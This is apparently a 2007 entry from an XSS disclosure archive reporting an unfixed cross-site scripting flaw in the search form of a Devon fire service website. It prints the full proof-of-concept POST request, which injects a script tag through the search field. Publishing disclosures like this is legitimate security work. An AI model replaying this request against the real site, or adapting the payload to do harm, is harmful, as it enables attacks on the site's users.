Advertisements:
Security researcher Zer0Man, has submitted on 04/12/2007 a cross-site-scripting (XSS) vulnerability affecting www.dsfire.gov.uk, which at the time of submission ranked 2085036 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 04/12/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 04/12/2007 Date published: 04/12/2007 Fixed? Mail us!Status:  UNFIXED
Author: Zer0Man Domain: www.dsfire.gov.uk Category: XSS Pagerank: 2085036
URL: http://www.dsfire.gov.uk/MCMS_DevonFireVB/Templates/SearchResults.aspx?NRMODE=Published&NRNODEGUID=%
7b2BB42892-2D4C-4173-9F8B-D8E68D984CC8%7d&NRORIGINALURL=%2fdevonfire%2fSearchResults.htm&NRCACHEHINT
=Guest
POST: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE4Njg0MjQ2MjYPZBYCZg9kFgICAw9kFg4CAQ8PFgIeB1 Zpc2libGVoZBYCAgEPDxYCHgRUZXh0BRdFbnRlciBzZWFyY2ggd29yZHMgaGVyZRYCHgdvbkZvY3VzBRRqYXZhc2NyaXB0OnNlbG VjdCgpO2QCBQ9kFgICAQ8WAh8BBU48bGk%2BPGEgaHJlZiA9Ii9EZXZvbkZpcmUvQ29udGFjdFVzLmh0bSIgVGl0bGU9IkNvbnRh Y3QgVXMiPkNvbnRhY3QgVXM8L2E%2BPC9saT5kAgkPZBYIAgMPD2QWAh8CBRRqYXZhc2NyaXB0OnNlbGVjdCgpO2QCEA8PFgIfAG hkZAISDw8WAh8AaGRkAhQPDxYCHwBoZGQCCw8PFgIfAGhkFgICAw88KwAJAQAPFgIeDU5ldmVyRXhwYW5kZWRnZGQCDQ9kFgYCAQ 9kFgJmDxYCHwFlZAIDD2QWAmYPFgIfAWVkAgUPZBYCAgEPFgIfAWVkAg8PZBYCAgEPFgIfAQX%2BATxsaT48YSBocmVmID0iL0Rl dm9uRmlyZS9QcmludEhlbHAuaHRtIiBUaXRsZT0iSGVscCB3aXRoIFByaW50aW5nIj5IZWxwIHdpdGggUHJpbnRpbmc8L2E%2BPC 9saT48bGk%2BPGEgaHJlZiA9Ii9EZXZvbkZpcmUvQWNjZXNzaWJpbGl0eS5odG0iIFRpdGxlPSJBY2Nlc3NpYmlsaXR5Ij5BY2Nl c3NpYmlsaXR5PC9hPjwvbGk%2BPGxpPjxhIGhyZWYgPSIvRGV2b25GaXJlL1NpdGVNYXAuaHRtIiBUaXRsZT0iU2l0ZSBNYXAiPl NpdGUgTWFwPC9hPjwvbGk%2BZAIRD2QWBAIBDxYCHwBoZAIDDxYCHwBoZGRrFfb8ds751hH2x33eOENUXkDM7w%3D%3D&_ctl0%3 AContentPlaceHolder1%3AtxtSearch=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_ctl0%3AContentPla ceHolder1%3AButton1=Go&_ctl0%3AContentPlaceHolder1%3ARadioButtonList=0&__EVENTVALIDATION=%2FwEWCgKAw du0AwL7s5WNCwKd%2FJaKAwKRleuVAQKYy4jcBQKHy4jcBQKGy4jcBQKIpKKyCQL6xaz1DgKd6v%2F0A4dRvjOAjkQ9H1VyQPICe doZKIYq
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense 		Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.